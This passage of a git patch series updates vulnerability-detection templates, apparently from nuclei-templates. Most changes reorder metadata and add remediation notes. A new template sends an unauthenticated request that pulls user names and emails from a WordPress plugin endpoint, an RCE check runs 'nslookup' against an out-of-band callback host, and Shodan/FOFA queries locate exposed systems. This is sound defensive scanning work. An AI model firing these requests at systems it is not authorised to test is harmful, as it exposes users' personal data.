a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php. + remediation: | + Apply the latest security patches and updates provided by the Thinkphp framework. reference: - https://tttang.com/archive/1865/ - https://nvd.nist.gov/vuln/detail/CVE-2022-47945 @@ -17,15 +19,15 @@ info: cve-id: CVE-2022-47945 cwe-id: CWE-22 epss-score: 0.05688 - cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* epss-percentile: 0.92344 + cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* metadata: - max-request: 2 - fofa-query: header="think_lang" - shodan-query: title:"Thinkphp" verified: true + max-request: 2 vendor: thinkphp product: thinkphp + shodan-query: title:"Thinkphp" + fofa-query: header="think_lang" tags: cve,cve2022,thinkphp,lfi http: diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 7a5bc9ee85..8c6113c600 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://twitter.com/horizon3attack/status/1616062915097886732?s=46&t=ER_is9G4FlEebVFQPpnM0Q - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ @@ -17,14 +19,14 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47966 epss-score: 0.97467 - cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* epss-percentile: 0.99939 + cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"ManageEngine" verified: true + max-request: 1 vendor: zohocorp product: manageengine_access_manager_plus + shodan-query: title:"ManageEngine" tags: packetstorm,cve,cve2022,rce,zoho,manageengine,oast,kev variables: cmd: 'nslookup {{interactsh-url}}' diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index c45306c3bf..fd4175d965 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations. + remediation: The obsolete API call was removed in 4.4.2 PL2. This vulnerability can be remediated by upgrading to either 4.4.2 PL2 or 5.x. reference: - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/ - https://www.ibm.com/support/pages/node/6952319 - https://exchange.xforce.ibmcloud.com/vulnerabilities/243512 - http://packetstormsecurity.com/files/171772/IBM-Aspera-Faspex-4.4.1-YAML-Deserialization.html - https://nvd.nist.gov/vuln/detail/CVE-2022-47986 - remediation: The obsolete API call was removed in 4.4.2 PL2. This vulnerability can be remediated by upgrading to either 4.4.2 PL2 or 5.x. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-47986 cwe-id: CWE-502 epss-score: 0.93666 - cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* epss-percentile: 0.98767 + cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"Aspera Faspex" verified: true + max-request: 1 vendor: ibm product: aspera_faspex + shodan-query: html:"Aspera Faspex" tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm http: diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index e47ee8d3ce..d45b1d5b30 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: - https://github.com/Sakura-501/Opencats-0.9.7-Vulnerabilities - https://github.com/Sakura-501/Opencats-0.9.7-Vulnerabilities/blob/main/Opencats-0.9.7-Reflected%20XSS%20in%20onChangeTag.md @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-48012 cwe-id: CWE-79 epss-score: 0.00064 - cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:* epss-percentile: 0.26092 + cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: title:"opencats" verified: true + max-request: 3 vendor: opencats product: opencats + shodan-query: title:"opencats" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index d593f5c83f..f28847931e 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://docs.google.com/document/d/1HD4GKumkZpa6FNHuf0QQSKFvoYhCfwXpbyWiJdx1VtE - https://twitter.com/For3stCo1d/status/1622576544190464000 @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-48165 cwe-id: CWE-284 epss-score: 0.04725 - cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:* epss-percentile: 0.91602 + cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:-1350437236 verified: true + max-request: 1 vendor: wavlink product: wl-wn530h4_firmware + shodan-query: http.favicon.hash:-1350437236 tags: cve,cve2022,wavlink,router,exposure http: diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index e7dff63c1b..6ed061333a 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 8.8.3. reference: - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f - https://nvd.nist.gov/vuln/detail/CVE-2022-4897 - remediation: Fixed in version 8.8.3. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4897 cwe-id: CWE-79 epss-score: 0.00261 - cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* epss-percentile: 0.63049 + cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: ithemes product: backupbuddy + framework: wordpress tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated http: diff --git a/http/cves/2023/CVE-2023-32117 2.yaml b/http/cves/2023/CVE-2023-32117 2.yaml new file mode 100644 index 0000000000..e426d8e267 --- /dev/null +++ b/http/cves/2023/CVE-2023-32117 2.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-32117 + +info: + name: Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints + author: DhiyaneshDK + severity: high + description: | + The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more. + remediation: Fixed in 1.2.0 + reference: + - https://github.com/RandomRobbieBF/CVE-2023-32117 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/integrate-google-drive/integrate-google-drive-1199-missing-authorization-via-rest-api-endpoints + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2023-32117 + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/integrate-google-drive/" + tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive + +http: + - method: POST + path: + - "{{BaseURL}}/wp-json/igd/v1/get-users-data" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"username":' + - '"name":' + - '"email":' + - '"role":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-32117.yaml b/http/cves/2023/CVE-2023-32117.yaml index e426d8e267..ce2b09ada0 100644 --- a/http/cves/2023/CVE-2023-32117.yaml +++ b/http/cves/2023/CVE-2023-32117.yaml @@ -15,9 +15,9 @@ info: cvss-score: 7.3 cve-id: CVE-2023-32117 metadata: - verified: true max-request: 1 publicwww-query: "/wp-content/plugins/integrate-google-drive/" + verified: true tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,integrate-google-drive http: diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 5e72cbdb60..2ffca5bce9 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -7,7 +7,7 @@ info: description: | Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. remediation: | - Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). Additionally, implement input validation and output encoding to mitigate the risk of XSS attacks. + Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). reference: - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/ diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346 2.yaml similarity index 100% rename from http/cves/2023/CVE-2023-36346.yaml rename to http/cves/2023/CVE-2023-36346 2.yaml diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index d6b8d91168..5f92caf6b8 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -7,7 +7,7 @@ info: description: | Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client. remediation: | - Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). Additionally, implement input validation and output encoding to mitigate the risk of XSS attacks. + Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). reference: - https://github.com/Zimbra/zm-web-client/pull/827 - https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15/ From d103f3140c461a95cd8c63f5623f99bf714c3863 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 6 Sep 2023 17:37:50 +0530 Subject: [PATCH 0189/1090] reference & matcher update --- http/cves/2023/CVE-2023-39361.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index b41347b210..ddd9e6365d 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -8,7 +8,7 @@ info: Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability. reference: - https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg - - https://cve.report/CVE-2023-4634 + - https://nvd.nist.gov/vuln/detail/CVE-2023-39361 classification: cve-id: CVE-2023-39361 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -32,5 +32,5 @@ http: dsl: - 'duration>=10' - 'status_code == 200' - - 'contains_all(body, "var treeView=", "cacti")' + - 'contains_all(body, "Tree Mode", "cacti")' condition: and From a09a0c8d7abf151284a000974c76b5e0cf892194 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Sep 2023 17:39:01 +0530 Subject: [PATCH 0190/1090] Updated 2021 CVEs --- http/cves/2021/CVE-2021-1472.yaml | 8 +++++--- http/cves/2021/CVE-2021-1497.yaml | 4 +++- http/cves/2021/CVE-2021-1498.yaml | 4 +++- http/cves/2021/CVE-2021-1499.yaml | 4 +++- http/cves/2021/CVE-2021-20031.yaml | 6 ++++-- http/cves/2021/CVE-2021-20038.yaml | 4 +++- http/cves/2021/CVE-2021-20090.yaml | 4 +++- http/cves/2021/CVE-2021-20091.yaml | 4 +++- http/cves/2021/CVE-2021-20092.yaml | 4 +++- http/cves/2021/CVE-2021-20114.yaml | 4 +++- http/cves/2021/CVE-2021-20123.yaml | 8 +++++--- http/cves/2021/CVE-2021-20124.yaml | 8 +++++--- http/cves/2021/CVE-2021-20137.yaml | 4 +++- http/cves/2021/CVE-2021-20150.yaml | 6 ++++-- http/cves/2021/CVE-2021-20158.yaml | 6 ++++-- http/cves/2021/CVE-2021-20167.yaml | 4 ++-- http/cves/2021/CVE-2021-20323.yaml | 8 +++++--- http/cves/2021/CVE-2021-20792.yaml | 6 ++++-- http/cves/2021/CVE-2021-20837.yaml | 4 +++- http/cves/2021/CVE-2021-21087.yaml | 6 ++++-- http/cves/2021/CVE-2021-21234.yaml | 4 +++- http/cves/2021/CVE-2021-21287.yaml | 4 +++- http/cves/2021/CVE-2021-21307.yaml | 4 ++-- http/cves/2021/CVE-2021-21311.yaml | 10 +++++----- http/cves/2021/CVE-2021-21315.yaml | 6 +++--- http/cves/2021/CVE-2021-21345.yaml | 4 ++-- http/cves/2021/CVE-2021-21351.yaml | 4 ++-- http/cves/2021/CVE-2021-21389.yaml | 6 +++--- http/cves/2021/CVE-2021-21402.yaml | 10 +++++----- http/cves/2021/CVE-2021-21479.yaml | 4 +++- http/cves/2021/CVE-2021-21745.yaml | 4 +++- http/cves/2021/CVE-2021-21799.yaml | 8 +++++--- http/cves/2021/CVE-2021-21800.yaml | 8 +++++--- http/cves/2021/CVE-2021-21801.yaml | 4 +++- http/cves/2021/CVE-2021-21802.yaml | 4 +++- http/cves/2021/CVE-2021-21803.yaml | 4 +++- http/cves/2021/CVE-2021-21805.yaml | 8 +++++--- http/cves/2021/CVE-2021-21816.yaml | 4 +++- http/cves/2021/CVE-2021-21881.yaml | 4 +++- http/cves/2021/CVE-2021-21972.yaml | 4 +++- http/cves/2021/CVE-2021-21973.yaml | 4 +++- http/cves/2021/CVE-2021-21975.yaml | 4 +++- http/cves/2021/CVE-2021-21978.yaml | 4 +++- http/cves/2021/CVE-2021-21985.yaml | 4 +++- http/cves/2021/CVE-2021-22005.yaml | 4 +++- http/cves/2021/CVE-2021-22053.yaml | 6 ++++-- http/cves/2021/CVE-2021-22054.yaml | 6 ++++-- http/cves/2021/CVE-2021-22122.yaml | 4 +++- http/cves/2021/CVE-2021-22145.yaml | 4 +++- http/cves/2021/CVE-2021-22205.yaml | 6 ++++-- http/cves/2021/CVE-2021-22214.yaml | 6 ++++-- http/cves/2021/CVE-2021-22502.yaml | 4 +++- http/cves/2021/CVE-2021-22707.yaml | 10 ++++++---- http/cves/2021/CVE-2021-22873.yaml | 8 +++++--- http/cves/2021/CVE-2021-22911.yaml | 8 +++++--- http/cves/2021/CVE-2021-22986.yaml | 4 +++- http/cves/2021/CVE-2021-23241.yaml | 4 +++- http/cves/2021/CVE-2021-24145.yaml | 8 ++++---- http/cves/2021/CVE-2021-24146.yaml | 6 ++++-- http/cves/2021/CVE-2021-24150.yaml | 8 +++++--- http/cves/2021/CVE-2021-24155.yaml | 8 ++++---- http/cves/2021/CVE-2021-24165.yaml | 6 ++++-- http/cves/2021/CVE-2021-24169.yaml | 8 ++++---- http/cves/2021/CVE-2021-24176.yaml | 6 ++++-- http/cves/2021/CVE-2021-24210.yaml | 6 ++++-- http/cves/2021/CVE-2021-24214.yaml | 8 +++++--- http/cves/2021/CVE-2021-24226.yaml | 6 ++++-- http/cves/2021/CVE-2021-24227.yaml | 6 ++++-- http/cves/2021/CVE-2021-24235.yaml | 6 ++++-- http/cves/2021/CVE-2021-24236.yaml | 6 ++++-- http/cves/2021/CVE-2021-24237.yaml | 6 ++++-- http/cves/2021/CVE-2021-24239.yaml | 8 ++++---- http/cves/2021/CVE-2021-24245.yaml | 6 ++++-- http/cves/2021/CVE-2021-24274.yaml | 6 ++++-- http/cves/2021/CVE-2021-24275.yaml | 6 ++++-- http/cves/2021/CVE-2021-24276.yaml | 6 ++++-- http/cves/2021/CVE-2021-24278.yaml | 6 ++++-- http/cves/2021/CVE-2021-24284.yaml | 6 ++++-- http/cves/2021/CVE-2021-24285.yaml | 6 ++++-- http/cves/2021/CVE-2021-24287.yaml | 8 ++++---- http/cves/2021/CVE-2021-24288.yaml | 6 ++++-- http/cves/2021/CVE-2021-24291.yaml | 6 ++++-- http/cves/2021/CVE-2021-24298.yaml | 6 ++++-- http/cves/2021/CVE-2021-24300.yaml | 6 ++++-- http/cves/2021/CVE-2021-24316.yaml | 6 ++++-- http/cves/2021/CVE-2021-24320.yaml | 6 ++++-- http/cves/2021/CVE-2021-24335.yaml | 6 ++++-- http/cves/2021/CVE-2021-24340.yaml | 6 ++++-- http/cves/2021/CVE-2021-24342.yaml | 6 ++++-- http/cves/2021/CVE-2021-24347.yaml | 8 ++++---- http/cves/2021/CVE-2021-24351.yaml | 6 ++++-- http/cves/2021/CVE-2021-24358.yaml | 6 ++++-- http/cves/2021/CVE-2021-24364.yaml | 6 ++++-- http/cves/2021/CVE-2021-24370.yaml | 8 +++++--- http/cves/2021/CVE-2021-24387.yaml | 6 ++++-- http/cves/2021/CVE-2021-24389.yaml | 6 ++++-- http/cves/2021/CVE-2021-24406.yaml | 6 ++++-- http/cves/2021/CVE-2021-24407.yaml | 6 ++++-- http/cves/2021/CVE-2021-24409.yaml | 10 +++++----- http/cves/2021/CVE-2021-24435.yaml | 8 ++++---- http/cves/2021/CVE-2021-24436.yaml | 8 ++++---- http/cves/2021/CVE-2021-24452.yaml | 8 ++++---- http/cves/2021/CVE-2021-24472.yaml | 10 ++++++---- http/cves/2021/CVE-2021-24488.yaml | 6 ++++-- http/cves/2021/CVE-2021-24495.yaml | 6 ++++-- http/cves/2021/CVE-2021-24498.yaml | 6 ++++-- http/cves/2021/CVE-2021-24499.yaml | 6 ++++-- http/cves/2021/CVE-2021-24510.yaml | 4 +++- http/cves/2021/CVE-2021-24554.yaml | 8 +++++--- http/cves/2021/CVE-2021-24647.yaml | 8 ++++---- http/cves/2021/CVE-2021-24666.yaml | 8 ++++---- http/cves/2021/CVE-2021-24731.yaml | 8 ++++---- http/cves/2021/CVE-2021-24746.yaml | 8 +++++--- http/cves/2021/CVE-2021-24750.yaml | 6 ++++-- http/cves/2021/CVE-2021-24762.yaml | 6 ++++-- http/cves/2021/CVE-2021-24827.yaml | 8 +++++--- http/cves/2021/CVE-2021-24838.yaml | 8 +++++--- http/cves/2021/CVE-2021-24862.yaml | 8 ++++---- http/cves/2021/CVE-2021-24875.yaml | 8 ++++---- http/cves/2021/CVE-2021-24891.yaml | 6 ++++-- http/cves/2021/CVE-2021-24910.yaml | 8 +++++--- http/cves/2021/CVE-2021-24917.yaml | 8 ++++---- http/cves/2021/CVE-2021-24926.yaml | 6 ++++-- http/cves/2021/CVE-2021-24931.yaml | 8 ++++---- http/cves/2021/CVE-2021-24940.yaml | 8 ++++---- http/cves/2021/CVE-2021-24946.yaml | 8 +++++--- http/cves/2021/CVE-2021-24947.yaml | 6 ++++-- http/cves/2021/CVE-2021-24956.yaml | 8 ++++---- http/cves/2021/CVE-2021-24970.yaml | 8 ++++---- http/cves/2021/CVE-2021-24987.yaml | 6 ++++-- http/cves/2021/CVE-2021-24991.yaml | 6 ++++-- http/cves/2021/CVE-2021-24997.yaml | 6 ++++-- http/cves/2021/CVE-2021-25003.yaml | 8 +++++--- http/cves/2021/CVE-2021-25008.yaml | 6 ++++-- http/cves/2021/CVE-2021-25028.yaml | 6 ++++-- http/cves/2021/CVE-2021-25033.yaml | 6 ++++-- http/cves/2021/CVE-2021-25052.yaml | 6 ++++-- http/cves/2021/CVE-2021-25055.yaml | 6 ++++-- http/cves/2021/CVE-2021-25063.yaml | 6 ++++-- http/cves/2021/CVE-2021-25065.yaml | 10 +++++----- http/cves/2021/CVE-2021-25067.yaml | 8 ++++---- http/cves/2021/CVE-2021-25074.yaml | 6 ++++-- http/cves/2021/CVE-2021-25075.yaml | 6 +++--- http/cves/2021/CVE-2021-25078.yaml | 8 ++++---- http/cves/2021/CVE-2021-25085.yaml | 8 +++++--- http/cves/2021/CVE-2021-25099.yaml | 8 +++++--- http/cves/2021/CVE-2021-25104.yaml | 8 ++++---- http/cves/2021/CVE-2021-25111.yaml | 6 ++++-- http/cves/2021/CVE-2021-25112.yaml | 6 ++++-- http/cves/2021/CVE-2021-25114.yaml | 10 ++++++---- http/cves/2021/CVE-2021-25118.yaml | 6 +++--- http/cves/2021/CVE-2021-25120.yaml | 6 ++++-- http/cves/2021/CVE-2021-25281.yaml | 4 +++- http/cves/2021/CVE-2021-25296.yaml | 8 +++++--- http/cves/2021/CVE-2021-25297.yaml | 8 +++++--- http/cves/2021/CVE-2021-25298.yaml | 8 +++++--- http/cves/2021/CVE-2021-25299.yaml | 8 +++++--- http/cves/2021/CVE-2021-25646.yaml | 4 +++- http/cves/2021/CVE-2021-25864.yaml | 8 +++++--- http/cves/2021/CVE-2021-25899.yaml | 6 ++++-- http/cves/2021/CVE-2021-26084.yaml | 6 ++++-- http/cves/2021/CVE-2021-26085.yaml | 6 ++++-- http/cves/2021/CVE-2021-26086.yaml | 6 ++++-- http/cves/2021/CVE-2021-26247.yaml | 4 +++- http/cves/2021/CVE-2021-26295.yaml | 10 ++++++---- http/cves/2021/CVE-2021-26475.yaml | 4 +++- http/cves/2021/CVE-2021-26598.yaml | 6 ++++-- http/cves/2021/CVE-2021-26702.yaml | 4 +++- http/cves/2021/CVE-2021-26710.yaml | 4 +++- http/cves/2021/CVE-2021-26723.yaml | 4 +++- http/cves/2021/CVE-2021-26812.yaml | 6 ++++-- http/cves/2021/CVE-2021-26855.yaml | 6 +++--- http/cves/2021/CVE-2021-27124.yaml | 6 ++++-- http/cves/2021/CVE-2021-27132.yaml | 4 +++- http/cves/2021/CVE-2021-27309.yaml | 6 ++++-- http/cves/2021/CVE-2021-27310.yaml | 4 +++- http/cves/2021/CVE-2021-27314.yaml | 6 ++++-- http/cves/2021/CVE-2021-27315.yaml | 6 ++++-- http/cves/2021/CVE-2021-27316.yaml | 6 ++++-- http/cves/2021/CVE-2021-27319.yaml | 6 ++++-- http/cves/2021/CVE-2021-27320.yaml | 6 ++++-- http/cves/2021/CVE-2021-27330.yaml | 8 +++++--- http/cves/2021/CVE-2021-27358.yaml | 6 ++++-- http/cves/2021/CVE-2021-27519.yaml | 8 +++++--- http/cves/2021/CVE-2021-27520.yaml | 8 +++++--- http/cves/2021/CVE-2021-27561.yaml | 4 +++- http/cves/2021/CVE-2021-27651.yaml | 4 +++- http/cves/2021/CVE-2021-27670.yaml | 8 +++++--- http/cves/2021/CVE-2021-27748.yaml | 4 +++- http/cves/2021/CVE-2021-27850.yaml | 4 +++- http/cves/2021/CVE-2021-27905.yaml | 4 ++-- http/cves/2021/CVE-2021-27909.yaml | 8 +++++--- http/cves/2021/CVE-2021-27931.yaml | 4 +++- http/cves/2021/CVE-2021-28073.yaml | 2 +- http/cves/2021/CVE-2021-28149.yaml | 4 +++- http/cves/2021/CVE-2021-28150.yaml | 4 +++- http/cves/2021/CVE-2021-28151.yaml | 4 +++- http/cves/2021/CVE-2021-28164.yaml | 4 +++- http/cves/2021/CVE-2021-28169.yaml | 4 +++- http/cves/2021/CVE-2021-28377.yaml | 6 ++++-- http/cves/2021/CVE-2021-28419.yaml | 6 ++++-- http/cves/2021/CVE-2021-28854.yaml | 2 ++ http/cves/2021/CVE-2021-28918.yaml | 6 ++++-- http/cves/2021/CVE-2021-28937.yaml | 4 +++- http/cves/2021/CVE-2021-29156.yaml | 6 +++--- http/cves/2021/CVE-2021-29203.yaml | 4 +++- http/cves/2021/CVE-2021-29441.yaml | 4 +++- http/cves/2021/CVE-2021-29442.yaml | 4 +++- http/cves/2021/CVE-2021-29484.yaml | 6 +++--- http/cves/2021/CVE-2021-29490.yaml | 8 ++++---- http/cves/2021/CVE-2021-29505.yaml | 4 ++-- http/cves/2021/CVE-2021-29622.yaml | 4 ++-- http/cves/2021/CVE-2021-29625.yaml | 4 ++-- http/cves/2021/CVE-2021-3002.yaml | 4 +++- http/cves/2021/CVE-2021-30049.yaml | 4 +++- http/cves/2021/CVE-2021-30128.yaml | 8 +++++--- http/cves/2021/CVE-2021-30134.yaml | 8 +++++--- http/cves/2021/CVE-2021-30151.yaml | 4 +++- http/cves/2021/CVE-2021-3017.yaml | 4 +++- http/cves/2021/CVE-2021-30175.yaml | 4 +++- http/cves/2021/CVE-2021-3019.yaml | 4 +++- http/cves/2021/CVE-2021-30213.yaml | 4 +++- http/cves/2021/CVE-2021-30461.yaml | 6 ++++-- http/cves/2021/CVE-2021-30497.yaml | 6 ++++-- http/cves/2021/CVE-2021-3110.yaml | 6 ++++-- http/cves/2021/CVE-2021-31195.yaml | 6 ++++-- http/cves/2021/CVE-2021-31249.yaml | 4 +++- http/cves/2021/CVE-2021-31250.yaml | 4 +++- http/cves/2021/CVE-2021-3129.yaml | 6 ++++-- http/cves/2021/CVE-2021-31537.yaml | 4 +++- http/cves/2021/CVE-2021-31581.yaml | 4 ++-- http/cves/2021/CVE-2021-31589.yaml | 8 +++++--- http/cves/2021/CVE-2021-31602.yaml | 6 ++++-- http/cves/2021/CVE-2021-31682.yaml | 6 ++++-- http/cves/2021/CVE-2021-31755.yaml | 4 +++- http/cves/2021/CVE-2021-31805.yaml | 4 ++-- http/cves/2021/CVE-2021-31856.yaml | 4 +++- http/cves/2021/CVE-2021-31862.yaml | 4 +++- http/cves/2021/CVE-2021-32030.yaml | 4 +++- http/cves/2021/CVE-2021-32172.yaml | 4 +++- http/cves/2021/CVE-2021-3223.yaml | 12 +++++++----- http/cves/2021/CVE-2021-32305.yaml | 4 +++- http/cves/2021/CVE-2021-32618.yaml | 4 +++- http/cves/2021/CVE-2021-32682.yaml | 6 +++--- http/cves/2021/CVE-2021-32789.yaml | 6 ++++-- http/cves/2021/CVE-2021-32819.yaml | 4 +++- http/cves/2021/CVE-2021-32820.yaml | 6 ++++-- http/cves/2021/CVE-2021-32853.yaml | 6 ++++-- http/cves/2021/CVE-2021-3293.yaml | 4 +++- http/cves/2021/CVE-2021-3297.yaml | 4 +++- http/cves/2021/CVE-2021-33044.yaml | 4 +++- http/cves/2021/CVE-2021-33221.yaml | 4 +++- http/cves/2021/CVE-2021-33357.yaml | 4 +++- http/cves/2021/CVE-2021-33544.yaml | 4 +++- http/cves/2021/CVE-2021-33564.yaml | 6 ++++-- http/cves/2021/CVE-2021-3374.yaml | 4 +++- http/cves/2021/CVE-2021-3377.yaml | 6 +++--- http/cves/2021/CVE-2021-3378.yaml | 4 +++- http/cves/2021/CVE-2021-33807.yaml | 4 +++- http/cves/2021/CVE-2021-33851.yaml | 8 +++++--- http/cves/2021/CVE-2021-33904.yaml | 4 +++- http/cves/2021/CVE-2021-34370.yaml | 4 +++- http/cves/2021/CVE-2021-34429.yaml | 4 +++- http/cves/2021/CVE-2021-34473.yaml | 4 ++-- http/cves/2021/CVE-2021-34621.yaml | 6 ++++-- http/cves/2021/CVE-2021-34640.yaml | 6 ++++-- http/cves/2021/CVE-2021-34643.yaml | 6 ++++-- http/cves/2021/CVE-2021-34805.yaml | 4 +++- http/cves/2021/CVE-2021-35250.yaml | 6 +++--- http/cves/2021/CVE-2021-35265.yaml | 6 ++++-- http/cves/2021/CVE-2021-35336.yaml | 6 ++++-- http/cves/2021/CVE-2021-35380.yaml | 4 +++- http/cves/2021/CVE-2021-35464.yaml | 8 +++++--- http/cves/2021/CVE-2021-35488.yaml | 8 +++++--- 